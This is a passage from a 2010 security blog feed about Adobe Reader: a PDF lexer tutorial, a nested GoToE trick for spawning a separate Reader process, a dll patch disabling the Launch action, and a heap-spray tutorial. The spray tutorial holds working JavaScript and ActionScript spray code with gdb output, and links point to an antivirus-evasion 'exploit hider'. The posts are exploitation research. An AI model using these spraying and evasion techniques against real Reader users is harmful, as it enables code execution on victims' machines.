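            raise ValueError("malformed entry at byte %d" % pos)
        offset, generation, kind = match.groups()
        entries.append((int(offset), int(generation), kind.decode("ascii")))
    return entries

block = b"0000000000 65535 f \n0000017744 00000 n \n"
print(parse_xref_entries(block))
```

<p>The fixed width is what lets a reader seek straight to entry N of a subsection without reading the ones before it.</p>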
<h1>   File Trailer</h1>
<p>The trailer of a PDF file enables a conforming reader to quickly find the cross-reference table and certain special objects. Conforming readers should read a PDF file from its end. The last line of the file shall contain only the end-of-file marker, %%EOF. The two preceding lines shall contain, one per line and in order, the keyword startxref and the byte offset in the decoded stream from the beginning of the file to the beginning of the xref keyword in the last cross-reference section. The startxref line shall be preceded by the trailer dictionary, consisting of the keyword trailer followed by a series of key-value pairs enclosed in double angle brackets (&lt;&lt; and &gt;&gt;).<br />
Thus, the trailer has the following overall structure:</p>
<blockquote>
<p>       trailer<br />
           &lt;&lt; key1 value1 &#8230; keyn valuen &gt;&gt;<br />
       startxref<br />
       Byte_offset_of_last_cross-reference_section<br />
       %%EOF
</p></blockquote>
<p>So we just need to add these last 3 tokens&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_TRAILER = r'trailer'

@TOKEN(r'startxref'+ '['+white_spaces_r+']+[0-9]+')
def t_STARTXREF(t):
    t.value = int(t.value[10:],10)
    return t

t_EOF = r'%%EOF'
</div></pre>
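<p>Reading from the end, as the spec suggests, does not need the lexer at all. Here is a minimal Python 3 sketch, assuming the whole file is already in memory as bytes; <code>find_startxref</code> is a hypothetical helper name:</p>

```python
def find_startxref(data):
    """Return the byte offset written after the last 'startxref' keyword."""
    eof = data.rfind(b"%%EOF")
    if eof == -1:
        raise ValueError("no %%EOF marker")
    pos = data.rfind(b"startxref", 0, eof)
    if pos == -1:
        raise ValueError("no startxref keyword before %%EOF")
    # Whatever sits between the keyword and the marker should be the offset.
    return int(data[pos + len(b"startxref"):eof].strip())

tail = b"trailer\n...\nstartxref\n17942\n%%EOF\n"
print(find_startxref(tail))   # 17942
```

<p>From that offset a reader would jump to the xref keyword and only then start tokenizing, instead of lexing the file front to back the way the demo does.</p>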
<p>Ok&#8230; that&#8217;s pretty much it. Bored? Well I am.<br />
Where to go from here?<br />
The bar?<br />
Or the parser?</p>
<p>f/</p>
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/06/lexing-pdf-just-for-the-un-fun-of-it/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/09/t_small-b.png" medium="image">
			<media:title type="html">Follow feliam on Twitter</media:title>
		</media:content>
	</item>
		<item>
		<title>See you in the Adobe playground…</title>
		<link>http://feliam.wordpress.com/2010/06/16/see-you-in-the-adobe-playground/</link>
		<comments>http://feliam.wordpress.com/2010/06/16/see-you-in-the-adobe-playground/#comments</comments>
		<pubDate>Wed, 16 Jun 2010 21:52:51 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[adobe]]></category>
		<category><![CDATA[protections bypass]]></category>
		<category><![CDATA[sandbox]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=321</guid>
		<description><![CDATA[Wacharooga!! Let&#8217;s see how to run an external Adobe Reader process from a pdf file that&#8217;s being displayed in a web browser. This *technique* is a derivative of the pdf-into-pdf embedding post. It also uses the GotoE action to jump away to an embedded pdf. I just discovered that doing this from a browser viewed [...]]]></description>
				<content:encoded><![CDATA[<p>Wacharooga!!<br />
Let&#8217;s see how to run an external Adobe Reader process from a pdf file that&#8217;s being displayed in a web browser.<br />
This *technique* is a derivative of the pdf-into-pdf embedding <a href="http://feliam.wordpress.com/2010/01/13/generic-pdf-exploit-hider-embedpdf-py-and-goodbye-av-detection-012010/">post</a>. It also uses the GotoE action to jump away to an embedded pdf. I just discovered that doing this from a pdf viewed in a browser starts a separate Adobe Reader process. The ability to run a new, fresh and separate process has some interesting exploitability implications.<br />
In older Reader versions (previous to 9.2.3?) doing this also served as a way to bypass DEP optIn, but by now we have to settle for just these two facts:<br />
<a href="http://feliam.files.wordpress.com/2010/06/browsertoreader.png"><img src="http://feliam.files.wordpress.com/2010/06/browsertoreader.png?w=250&#038;h=175" alt="" title="browserToReader" class="alignright size-medium wp-image-340" height="175" width="250"></a><br />
[+] Whatever happens in the separate Reader will not crash the browser, potentially enabling other chances to exploit it.</p>
<p>[+] It makes it possible to develop exploits for highly predictable memory layouts.</p>
<p><span id="more-321"></span></p>
<p>We already posted <a href="http://feliam.wordpress.com/2010/01/13/generic-pdf-exploit-hider-embedpdf-py-and-goodbye-av-detection-012010/">here</a> a step-by-step howto on programmatically embedding a pdf file into another one, and also on how to jump into the embedded one. In that case the goal was to prove there was a way to hide the nature of a malicious pdf inside a better looking one.</p>
<p>Basically the GotoE pdf action documentation describes a way to open or jump to a pdf in another window. That&#8217;s accomplished by setting the NewWindow flag accordingly (setting it to true!). Check out what a new-window-opening GotoE action looks like..</p>
<pre style="border:2px solid red;background:none repeat scroll 0 0 rgb(255,255,181);color:rgb(0,144,153);margin:10px;padding:10px;">&lt;&lt;
  /S /GoToE
  /T &lt;&lt;/N (embedfile.pdf)
       /R /C
       /NewWindow false
     &gt;&gt;
  /NewWindow false
&gt;&gt;

</pre>
<p>We&#8217;ve embedded <a href="http://feliam.files.wordpress.com/2010/06/mini.pdf">this</a> minimal pdf file into a pdf shell that will jump to it, <a href="http://feliam.files.wordpress.com/2010/06/escapethebrowsermini.pdf">escapeTheBrowserMini</a>. When you try that from a standalone Reader it will open a different window or tab depending on the Reader version, but in any case it shares the same process thanks to the magic of some IPC. When run from a simple click in a web browser, though, it will for some reason be forced to open the target pdf in a different Adobe Reader process. (tested in IE8/Opera/Chrome/FF+ADBE9.3.2)</p>
<p>That was great!<br />
But hey! This crashes my browser!!</p>
<p>If you jump to a crashing pdf, yes. And as we were flirting with the possibility of preventing the whole web browser from crashing along with Adobe in the case of a bad pdf, we need to keep going a little more&#8230;<br />
Surprisingly Adobe does some parsing in the parent instance every time it jumps to an embedded pdf, so the browser will crash if we jump away to a crashing pdf. But this does not go any deeper: if you jump to a pdf that jumps again to a third one, the grandparent web browser will not be affected.</p>
<p>We control whether to jump to a pdf in a different window or to replace the current one with the embedded pdf. Using that we can arrange a couple of nested GotoE actions and pdfs so that a single separate window is opened. A behavior like that may be achieved by making it jump from the web browser to a pdf shell in a separate NewWindow, where it jumps again, this time replacing the current PDF in the same window. A minitool to do this is pasted <a href="http://pastebin.com/ZWxqrFBT">here</a> and also <a href="http://sites.google.com/site/felipeandresmanzano/escapeTheBrowser.py">here</a>.</p>
<p>Test it hard and check out <a href="http://feliam.files.wordpress.com/2010/06/escapethebrowser.pdf">this</a> 100 windows pdf! WRAAAAH!</p>
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/06/16/see-you-in-the-adobe-playground/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/06/browsertoreader.png?w=300" medium="image">
			<media:title type="html">browserToReader</media:title>
		</media:content>
	</item>
		<item>
		<title>Launch PDF Action Mega Abuse !PATCH!</title>
		<link>http://feliam.wordpress.com/2010/03/31/launch-pdf-action-mega-abuse/</link>
		<comments>http://feliam.wordpress.com/2010/03/31/launch-pdf-action-mega-abuse/#comments</comments>
		<pubDate>Wed, 31 Mar 2010 07:09:30 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Launch]]></category>
		<category><![CDATA[patch]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/2010/03/31/launch-pdf-action-mega-abuse/</guid>
		<description><![CDATA[@DidierStevens has released a way to partially &#8220;control&#8221; the message shown by Adobe Reader when it launches an application from inside a pdf file with the PDFAction &#8220;/Launch&#8221;. Check it out here. I think it&#8217;s about time to start calling the application Launching capability of Adobe (and friends) a VULNERABILITY. Here you have a python [...]]]></description>
				<content:encoded><![CDATA[<p>@DidierStevens has released a way to partially &#8220;control&#8221; the message shown by Adobe Reader when it launches an application from inside a pdf file with the PDFAction &#8220;/Launch&#8221;. Check it out <a href="http://blog.didierstevens.com/2010/03/29/escape-from-pdf">here</a>.</p>
<p>I think it&#8217;s about time to start calling the application Launching capability of Adobe (and friends) a VULNERABILITY.</p>
<p><a href="http://pastebin.com/fjWznc3j">Here</a> you have a python script that PATCHES the affected dll and cripples the Launch Action. </p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 rgb(255,205,109);color:rgb(0,128,153);margin:10px;padding:10px;">
<pre>
#Megapatch for Didier Launch action abuse
#http://blog.didierstevens.com/2010/03/29/escape-from-pdf/

version="9.0"
path = "C:\\Program Files\\Adobe\\Adobe Reader %s\\Reader\\"%version
#path = "./"

dll = path+"AcroRd32.dll"
with open(dll,"rb") as f:
	data = f.read()
#Keep a backup of the original dll
with open(dll+".bak","wb") as f:
	f.write(data)
#replace() rewrites every occurrence; same length, so offsets stay valid
with open(dll,"wb") as f:
	f.write(data.replace(b"Launch",b"Felipe"))

</pre>
</div>
<p>I tested it in W7 / Adobe Reader 9.3 but it should work for every version/OS/Arch mixture. On some OSes you may have trouble replacing the dll.</p>
<p>(((( An untested improvement&#8230;  s/Felipe/######/g ))))</p>
<p>Felipe/</p>
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/03/31/launch-pdf-action-mega-abuse/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>
	</item>
		<item>
		<title>Filling Adobe’s heap …</title>
		<link>http://feliam.wordpress.com/2010/02/15/filling-adobes-heap/</link>
		<comments>http://feliam.wordpress.com/2010/02/15/filling-adobes-heap/#comments</comments>
		<pubDate>Mon, 15 Feb 2010 23:11:30 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[actionscript]]></category>
		<category><![CDATA[adobe]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[heap spray]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[memory]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=162</guid>
		<description><![CDATA[This post is about how to fill the Adobe Reader&#8217;s heap. We&#8217;ll summarize and put into practice 3 ways of filling Adobe Reader memory. The idea is that when Adobe finishes parsing our PDF we can be pretty sure that at some fixed address there will be controlled data. We&#8217;re not going to do any [...]]]></description>
				<content:encoded><![CDATA[
<table>
<tbody>
<tr>
<td>This post is about how to fill the Adobe Reader&#8217;s heap. We&#8217;ll summarize and put into practice 3 ways of filling Adobe Reader memory. The idea is that when Adobe finishes parsing our PDF we can be pretty sure that at some fixed address there will be controlled data. We&#8217;re not going to do any fancy feng-shui or heap massage; the idea is just to show 3 practical, known ways of filling the Reader process memory. Can we fill it? </td>
<td><a href="http://feliam.files.wordpress.com/2010/02/heapdraw1.png"><img class="alignnone size-medium wp-image-277" title="heapdraw" src="http://feliam.files.wordpress.com/2010/02/heapdraw1.png?w=180&#038;h=156" alt="" height="156" width="180"></a></td>
</tr>
</tbody>
</table>
<p><span id="more-162"></span></p>
<div style="font-style:italic;background:none repeat scroll 0 0 rgb(251,223,223);margin:20px;padding:20px;">&#8220;In <a title="Computer security" href="http://en.wikipedia.org/wiki/Computer_security">computer security</a>, <strong>heap spraying</strong> is a technique used in <a title="Exploit (computer security)" href="http://en.wikipedia.org/wiki/Exploit_%28computer_security%29">exploits</a> to facilitate <a title="Arbitrary code execution" href="http://en.wikipedia.org/wiki/Arbitrary_code_execution">arbitrary code execution</a>. In general, code that <em>sprays the heap</em> attempts to put a certain sequence of bytes at a predetermined location in the <a title="Random access memory" href="http://en.wikipedia.org/wiki/Random_access_memory">memory</a> of a target <a title="Process (computing)" href="http://en.wikipedia.org/wiki/Process_%28computing%29">process</a> by having it allocate (large) blocks on the process&#8217; <a title="Heap (programming)" href="http://en.wikipedia.org/wiki/Heap_%28programming%29">heap</a> and fill the bytes in these blocks with the right values. They commonly take advantage from the fact that these heap blocks will roughly be in the same location every time the heap spray is run.&#8221;</div>
<p>The basic idea is to make the target process allocate BIG chunks of memory, forcing the underlying memory allocator to align them on a 0x1000 boundary. With <a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">ASLR</a> you can&#8217;t predict exactly where a freshly allocated chunk of memory is going to be, but if the requested size is big enough the allocation will be aligned on a 0x1000 boundary in most OSs. An allocation size of 0x100000 bytes works on XP and on Linux 2.6.32 (32 bits). This will probably stay this way for a long time for memory usage and performance reasons. Think embedded!</p>
<div style="font-family:monospace;margin:10px;padding:10px;">
<p>Objective: Have some degree of certainty about what&#8217;s at a fixed memory address.</p>
<p>Needs:<br />
a) Big allocations should be aligned on a 0x1000 byte boundary.<br />
b) Being able to do a lot of big allocations programmatically.<br />
c) Controlling what&#8217;s inside our big allocations.</p>
</div>
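<p>To see why those three needs are enough, here is a minimal Python sketch of the arithmetic. It assumes the best case: a big chunk whose data starts exactly on a 0x1000 boundary and is filled with back-to-back copies of a 0x1000-byte minichunk. The function byte_at, the base address and the marker bytes are made up for the illustration.</p>

```python
PAGE = 0x1000      # alignment boundary of big allocations
BIG = 0x100000     # size of one big allocation


def byte_at(address, base, minichunk):
    """Byte found at `address` inside a big chunk that starts at `base`
    and consists of back-to-back copies of `minichunk`."""
    offset = address - base
    if offset not in range(BIG):
        raise ValueError("address is outside the big chunk")
    return minichunk[offset % len(minichunk)]


# Hypothetical minichunk: a 4-byte marker followed by filler, 0x1000 bytes total.
minichunk = b"\x3c" * 4 + b"A" * (PAGE - 4)
base = 0xAFFFB000  # hypothetical page-aligned address picked by the allocator

# Every page-aligned address inside the chunk holds the first minichunk byte.
for address in range(0xB0000000, 0xB0003000, PAGE):
    assert byte_at(address, base, minichunk) == minichunk[0]
```

<p>Whatever page-aligned base the allocator picks, the result is the same, which is the whole point: we don&#8217;t need to know the base, only that our target address falls inside one of the chunks.</p>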
<p>Wikipedia says that there are 3 ways of implementing a heap spray: JavaScript, ActionScript, and images. So we&#8217;ll honor those 3:</p>
<h2>The JS way</h2>
<p>This is the most popular way to play with memory allocations programmatically. There is a lot of research and there are plenty of practical examples about it. I personally started from <a href="http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf">here</a>. Since we are targeting PDFs it has one BIG drawback: you need a JavaScript interpreter in the target process. Conveniently, Adobe Reader ships one, so JS heap spraying works there.</p>
<p>The following JS code constructs a 0x100000 bytes long memory chunk by concatenating several copies of %%minichunk%%, and then copies that 0x100000 bytes long chunk 300 times into 300 newly allocated strings.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 rgb(255,255,179);color:rgb(0,128,153);margin:10px;padding:10px;">
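<pre>var slide_size = 0x100000;  // size in bytes of each big chunk
var size = 300;             // number of big chunks to allocate
var x = new Array(size);    // keeps every chunk referenced so none is freed
var chunk = %%minichunk%%;  // placeholder filled in by the python generator

// JS strings use 2 bytes per character, hence slide_size/2 characters
while (chunk.length &lt;= slide_size/2)
    chunk += chunk;

for (var i=0; i &lt; size; i+=1) {
    var id = &quot;&quot;+i;
    // the concatenation builds a new string, so each pass allocates a fresh copy
    x[i]= chunk.substring(4,slide_size/2-id.length-20)+id;
}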
</pre>
</div>
<p>That %%minichunk%% is a placeholder that is going to be filled in by the python script that generates the PDF file. If we make %%minichunk%% exactly 0x1000 bytes of controlled data, every 0x1000-aligned address that falls inside the big chunk will hold the first byte of a minichunk. And since we allocate the big chunk 300 times, we can speculate about an address where the OS will have put at least one of them.</p>
<p>OK, let&#8217;s try it! We&#8217;ll slightly modify the python from <a href="http://feliam.wordpress.com/2010/01/12/reinventing-the-wheel-again-putting-js-in-a-pdf-with-minipdf-py/">here</a> so it contains the spraying JS. The new python file looks like <a href="http://pastebin.com/f1f7fa4c8">this</a>.</p>
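<p>How the placeholder gets filled is up to the generator script. Here is a rough sketch, assuming the minichunk is written as a JavaScript unescape("%uXXXX...") literal. That is a common way of getting raw bytes into a JS string, but we are not claiming the linked script does exactly this. TEMPLATE and js_literal are made-up names, and the marker bytes are just an example.</p>

```python
PAGE = 0x1000

# Hypothetical one-line template; only the placeholder name comes from the JS above.
TEMPLATE = "var chunk = %%minichunk%%;"


def js_literal(data):
    """Encode bytes as unescape("%uXXXX...") so that each JS character
    carries two bytes, low byte first (little-endian in memory)."""
    if len(data) % 2:
        raise ValueError("need an even number of bytes")
    units = (int.from_bytes(data[i:i + 2], "little")
             for i in range(0, len(data), 2))
    return 'unescape("' + "".join("%%u%04x" % unit for unit in units) + '")'


# Example minichunk: 4 marker bytes plus filler, exactly 0x1000 bytes.
minichunk = b"\x3c" * 4 + b"A" * (PAGE - 4)
js = TEMPLATE.replace("%%minichunk%%", js_literal(minichunk))
```

<p>Note that 0x1000 bytes become 0x800 JS characters, which is why the spraying code works with slide_size/2.</p>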
<p>Let&#8217;s create the pdf:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">python JSSpray.py  &gt;JSSpray.pdf</div>
<p>and try it with Adobe Reader:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">acroread JSSpray.pdf</div>
<p>It&#8217;s running! Now get its PID and check its memory footprint:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>ps -eo pid,vsz,cmd -ww --sort=pid |grep acroread
8197 426104K /opt/Adobe/.../bin/acroread JSSpray.pdf
</pre>
</div>
<p>OK, 400 megabytes! It seems to be working!<br />
Let&#8217;s check out its memory mappings&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<p>cat /proc/8197/maps |head -n16</p>
<pre>08048000-0970b000 r-xp 00000000 08:01 1754759 ..bin/acroread
0970b000-09792000 rwxp 016c2000 08:01 1754759 ..bin/acroread
09792000-097a0000 rwxp 00000000 00:00 0
098f9000-0b0bc000 rwxp 00000000 00:00 0       [heap]
a0200000-a0221000 rwxp 00000000 00:00 0
a0221000-a0300000 ---p 00000000 00:00 0
a0389000-a038a000 ---p 00000000 00:00 0
a038a000-a0c8a000 rwxp 00000000 00:00 0
a0d8a000-a0e8a000 rwxp 00000000 00:00 0
a0f89000-a0f8a000 ---p 00000000 00:00 0
a0f8a000-a138a000 rwxp 00000000 00:00 0
a13e2000-a188a000 rwxp 00000000 00:00 0
a192a000-a198a000 rwxs 00000000 00:08 2654222 /SYSV0.. (del)
a198a000-b3b8a000 rwxp 00000000 00:00 0
b3b8a000-b3d8b000 rwxp 00000000 00:00 0
b3e4e000-b3f4e000 rwxp 00000000 00:00 0
</pre>
<p>&#8230;</p>
</div>
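<p>Picking the interesting region out of such a listing by eye works, but it can also be done mechanically. This is a small sketch that parses text in /proc/PID/maps format and returns the largest mapping. The sample is a handful of lines copied from the listing above; parse_maps and largest_mapping are names we made up.</p>

```python
SAMPLE_MAPS = """\
08048000-0970b000 r-xp 00000000 08:01 1754759 ..bin/acroread
098f9000-0b0bc000 rwxp 00000000 00:00 0       [heap]
a038a000-a0c8a000 rwxp 00000000 00:00 0
a198a000-b3b8a000 rwxp 00000000 00:00 0
b3b8a000-b3d8b000 rwxp 00000000 00:00 0
"""


def parse_maps(text):
    """Yield (start, end, perms) for each line in /proc/PID/maps format."""
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        start, end = (int(part, 16) for part in fields[0].split("-"))
        yield start, end, fields[1]


def largest_mapping(text):
    """Return the (start, end, perms) tuple that covers the most bytes."""
    return max(parse_maps(text), key=lambda m: m[1] - m[0])


start, end, perms = largest_mapping(SAMPLE_MAPS)
print("%08x-%08x %s %d MiB" % (start, end, perms, (end - start) // 2**20))
```

<p>For the sample it picks a198a000-b3b8a000, which is 290 MiB, about what 300 chunks of just under a megabyte add up to. For a live process the text would come from reading /proc/PID/maps instead of SAMPLE_MAPS.</p>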
<p>a198a000-b3b8a000 is probably the key. Let&#8217;s take a look with the debugger&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>gdb
GNU gdb (Gentoo 7.0 p1) 7.0
Copyright (C) 2009 Free Software Foundation, Inc.
(gdb) attach 8197
(gdb) x/8x 0xb0000000+0x1000*0
0xb0000000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xb0000010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xb0000000+0x1000*1
0xb0001000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xb0001010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xb0000000+0x1000*2
0xb0002000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xb0002010: 0x41414141 0x41414141 0x41414141 0x41414141
</pre>
</div>
<p>It worked! We read the same values at every 0x1000-aligned address. We just need to hope that some of our 300 megabytes ended up at address 0xb0000000. The JS spraying PDF is <a href="http://feliam.files.wordpress.com/2010/02/jsspray.pdf">here</a>.</p>
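<p>If the gdb dump looks cryptic: each value is a 32-bit word, and on little-endian x86 its bytes sit in memory in the reverse order of the printed hex digits. This small sketch (decode_gdb_line is a made-up helper) turns one dump line back into raw bytes, so the marker and the filler of the minichunk become visible.</p>

```python
def decode_gdb_line(line):
    """Turn one line of gdb x/...x output into (address, raw bytes).
    Words are converted back to their little-endian byte order."""
    address, words = line.split(":")
    raw = b"".join(int(word, 16).to_bytes(4, "little") for word in words.split())
    return int(address, 16), raw


address, raw = decode_gdb_line(
    "0xb0000000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141")
print(hex(address), raw)
```

<p>For the line above this gives four 0x3c marker bytes followed by twelve &#8220;A&#8221; bytes, starting at 0xb0000000.</p>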
<h2>The ActionScript way</h2>
<p>For the actual ActionScript part of this we&#8217;ll pick up from <a href="http://www.pornosecurity.org/blog/all-you-can-spray">here</a>, and for the PDF part we&#8217;ll take the SWF-into-PDF tool from this <a href="http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/">post</a>.</p>
<p>OK, the following <a href="http://haxe.org/">Haxe</a> code allocates, a configurable number of times, a 0x100000 bytes long memory chunk built by concatenating copies of the minichunk it is given.<br />
It expects as parameters the content of the minichunk and the number of times it should replicate the &#8216;big&#8217; 0x100000 bytes long chunk. For more info about AS sprays check <a href="http://roeehay.blogspot.com/2009/08/exploitation-of-cve-2009-1869.html">this</a> and <a href="http://blog.fireeye.com/research/2009/07/actionscript_heap_spray.html">that</a>.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 rgb(255,255,179);color:rgb(0,128,153);margin:10px;padding:10px;">
<pre>class MySpray
{
 static var Memory = new Array();
 static var chunk_size = 0x100000;
 static var chunk_num;
 static var minichunk;
 static var t;

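 static function main()
 {
  // both values come from the parameters passed to the SWF
  minichunk = flash.Lib.current.loaderInfo.parameters.minichunk;
  chunk_num = Std.parseInt(flash.Lib.current.loaderInfo.parameters.N);
  // call doSpray every 7 ms instead of allocating everything at once
  t = new haxe.Timer(7);
  t.run = doSpray;
 }

 static function doSpray()
 {
  // each tick builds one new big chunk out of copies of the minichunk
  var chunk = new flash.utils.ByteArray();

  while(chunk.length &lt; chunk_size)
   {
      chunk.writeMultiByte(minichunk, &#039;us-ascii&#039;);
   }

   // keep references to the chunk so it is never garbage collected
   for(i in 0...chunk_num)
   {
     Memory.push(chunk);
   }

   // stop after N ticks, that is after N big chunks
   chunk_num--;
   if(chunk_num == 0)
   {
     t.stop();
   }
 }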
}
</pre>
</div>
<p>Of course, it needs haxe to compile. And it compiles to Flash 9 issuing this command:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">haxe -main MySpray -swf9 MySpray.swf</div>
<p>Once you have the swf file you may insert it into a pdf file using this <a href="http://pastebin.com/f458bd175">py</a> from this <a href="http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/">post</a>.</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>python SWFSpray.py MySpray.swf "N=300&amp;minichunk=&lt;&lt;&lt;&gt;&gt;&gt;" &gt; SWFSpray.pdf
</pre>
</div>
<p>OK, let&#8217;s run Adobe Reader:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">acroread SWFSpray.pdf</div>
<p>&#8230; get its PID and check its memory footprint:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>ps -eo pid,vsz,cmd -ww --sort=pid |grep acroread
8234 568144K /opt/Adobe/.../bin/acroread SWFSpray.pdf
</pre>
</div>
<p>OK, 500 megabytes! It seems to be working!</p>
<p>Let&#8217;s check out its memory mappings&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:10px;">
<pre>cat /proc/8234/maps |head -n16
08048000-0970b000 r-xp 00000000 08:01 1754759 ../bin/acroread
0970b000-09792000 rwxp 016c2000 08:01 1754759 ../bin/acroread
09792000-097a0000 rwxp 00000000 00:00 0
0a712000-0ccda000 rwxp 00000000 00:00 0       [heap]
980f6000-983f6000 rwxp 00000000 00:00 0
983f6000-990f6000 ---p 00000000 00:00 0
990f6000-9a1f6000 rwxp 00000000 00:00 0
9a261000-9a429000 rwxp 00000000 00:00 0
9a5f0000-9b8f0000 rwxp 00000000 00:00 0
9b90a000-9cb0a000 rwxp 00000000 00:00 0
9cbee000-9ddee000 rwxp 00000000 00:00 0
9de9c000-9f09c000 rwxp 00000000 00:00 0
9f114000-a0314000 rwxp 00000000 00:00 0
a0356000-a1456000 rwxp 00000000 00:00 0
a145e000-a245e000 rwxp 00000000 00:00 0
a254e000-a354e000 rwxp 00000000 00:00 0
...
</pre>
</div>
<p>Let&#8217;s see what&#8217;s inside 9f114000-a0314000 with the debugger&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>gdb
GNU gdb (Gentoo 7.0 p1) 7.0
Copyright (C) 2009 Free Software Foundation, Inc.
(gdb) attach 8234
(gdb) x/8x 0xa0000000+0x1000*0
0xa0000000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0000010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*1
0xa0001000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0001010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*2
0xa0002000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0002010: 0x41414141 0x41414141 0x41414141 0x41414141
</pre>
</div>
<p>It also worked! It feels a little slow though.</p>
<h2>The Image way</h2>
<p>As both the PDF specification and the Adobe implementation are so bloated, there are probably a lot of different ways to accomplish this. Our approach is to use as few PDF objects as possible, so we&#8217;ll fill the memory using embedded images. <a href="http://www.adobe.com/devnet/acrobat/pdfs/PDF32000_2008.pdf">PDF32000 8.9.7 Inline Images</a> explains a way of inlining image data into the page contents.</p>
<div>As an alternative to the image XObjects described in 8.9.5, &#8220;Image Dictionaries&#8221;, a sampled image may be specified in the form of an inline image. This type of image shall be defined directly within the content stream in which it will be painted instead of being defined as a separate object. Because the inline format gives the reader less flexibility in managing the image data, it shall only be used for small images (4 KB or less).</div>
<p>Basically a PDF inline image goes inside the content stream of a page and has this look:</p>
<div style="font-family:monospace;margin:10px;padding:10px;">BI<br />
&#8230; Key-value pairs &#8230;<br />
ID<br />
&#8230; Image data &#8230;<br />
EI</div>
<p>where &#8230;</p>
<div style="font-family:monospace;margin:10px;padding:10px;">
<pre> BI       Begins an inline image object.
 ID       Begins the image data for an inline image object.
 EI       Ends an inline image object.
</pre>
</div>
<p>And here is an example in the form of a python string&#8230;</p>
<div style="font-family:monospace;margin:10px;padding:10px;">&#8220;BI /W 10 /H 1 /CS /G /BPC 8 ID AAAAAAAAAA EI&#8221;</div>
<p>&#8230; which represents a 10 pixel grayscale image, every pixel having the gray level encoded by &#8220;A&#8221;. Not so big for our purpose, but you get the idea. The 4 KB restriction/recommendation pointed out in the documentation is not enforced by Adobe&#8217;s implementation, so we can go really big. Also, the page contents are PDF streams and can be compressed and filtered with any number of PDF filters, meaning&#8230; small PDF file size.</p>
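<p>Both points can be sketched in a few lines of Python: building a one-row inline image of any size, and checking how well a repetitive payload compresses with zlib, which is the algorithm behind the /FlateDecode filter. This is not the linked generator; inline_image and the payload layout are assumptions made for the example.</p>

```python
import zlib


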